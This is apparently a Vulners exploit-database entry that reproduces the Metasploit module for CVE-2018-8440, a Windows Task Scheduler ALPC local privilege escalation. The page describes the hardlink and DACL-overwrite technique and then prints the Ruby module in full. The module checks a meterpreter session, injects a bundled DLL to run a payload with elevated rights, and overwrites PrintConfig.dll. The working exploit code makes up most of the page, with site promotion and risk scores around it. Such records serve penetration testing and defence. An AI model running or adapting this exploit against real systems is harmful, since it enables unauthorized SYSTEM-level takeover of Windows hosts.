Lucene search
K

Microsoft Windows ALPC Task Scheduler Local Privilege Elevation

🗓️ 13 Sep 2018 23:00:20Reported by SandboxEscaper, bwatters-r7, asoto-r7, Jacob RoblesType 
metasploit
 metasploit
🔗 www.rapid7.com👁 179 Views

Microsoft Windows ALPC Task Scheduler Local Privilege Elevation vulnerability in Windows Task Scheduler servic

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
        'Description' => %q{
          On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented
          by the task scheduler service can be used to write arbitrary DACLs to `.job` files located
          in `c:\windows\tasks` because the scheduler does not use impersonation when checking this
          location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be
          created to a file the user has read access to. After creating a hardlink, the vulnerability
          can be triggered to set the DACL on the linked file.

          WARNING:
          The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
          will be overwritten when the exploit runs.

          This module has been tested against Windows 10 Pro x64.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'SandboxEscaper', # Original discovery and PoC
          'bwatters-r7',          # msf module
          'asoto-r7',             # msf module
          'Jacob Robles'          # msf module
        ],
        'Platform' => 'win',
        'SessionTypes' => ['meterpreter'],
        'Targets' => [
          ['Windows 10 x64', { 'Arch' => ARCH_X64 }]
        ],
        'References' => [
          ['CVE', '2018-8440'],
          ['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
        ],
        'Notes' => {
          # Exploit overwrites PrintConfig.dll, which makes it unusable.
          'Stability' => [ OS_RESOURCE_LOSS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'DisclosureDate' => '2018-08-27',
        'DefaultTarget' => 0
      )
    )
  end

  def validate_active_host
    sysinfo['Computer']
    true
  rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
    elog(e)
    false
  end

  def validate_target
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo['Architecture'] == ARCH_X86
      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
    end

    version = get_version_info
    if version.xp_or_2003? && version.workstation?
      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
    end
  end

  def exploit
    unless session.type == 'meterpreter'
      fail_with(Failure::None, 'Only meterpreter sessions are supported')
    end

    print_status('Checking target...')
    unless validate_active_host
      raise Msf::Exploit::Failed, 'Could not connect to session'
    end

    validate_target

    print_status('Target looks good... attempting the LPE exploit')
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll'),
      generate_payload_dll
    )
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  rescue Rex::Post::Meterpreter::RequestError => e
    elog(e)
    print_error(e.message)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 May 2023 04:36Current
7.5High risk
Vulners AI Score7.5
CVSS 27.2
CVSS 3.17.8
EPSS0.18386
179